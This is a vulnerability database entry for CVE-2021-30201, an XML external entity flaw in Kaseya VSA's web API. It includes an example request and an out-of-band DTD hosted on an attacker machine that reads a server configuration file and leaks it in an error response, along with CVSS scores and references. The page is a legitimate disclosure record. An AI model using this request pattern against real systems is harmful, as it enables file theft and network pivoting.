CVE Vulnerability

CVE-2021-30201

The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <![CDATA[&send;]]> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % eval ""> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\kaseya\kserver\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 soap:ServerServer was unable to process request. ---> There is an error in XML document (24, -1000).rnrnSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.

5 /10

CVSS v2.0 :

V3 Legend

Vector :

Exploitability : 10 / Impact : 2.9

Attack Vector

Attack Complexity

Privileges Required

User Interaction

Confidentiality Impact PARTIAL

Integrity Impact NONE

Availability Impact NONE

Scope

7.5 /10

CVSS v3.0 : HIGH

V3 Legend

Vector :

Exploitability : 3.9 / Impact : 3.6

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction NONE

Confidentiality Impact HIGH

Integrity Impact NONE

Availability Impact NONE

Scope UNCHANGED

References
Link Resource
https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/ Patch Third Party Advisory
https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021 Release Notes Vendor Advisory
https://csirt.divd.nl/CVE-2021-30201 Exploit Third Party Advisory
https://csirt.divd.nl/DIVD-2021-00011 Patch Third Party Advisory
Configurations

Configuration 1

cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*
Information

Published : 2021-07-09 02:15

Updated : 2022-04-29 06:14

NVD link : CVE-2021-30201

Mitre link : CVE-2021-30201

Products Affected
No products.
CWE
CWE-611

Improper Restriction of XML External Entity Reference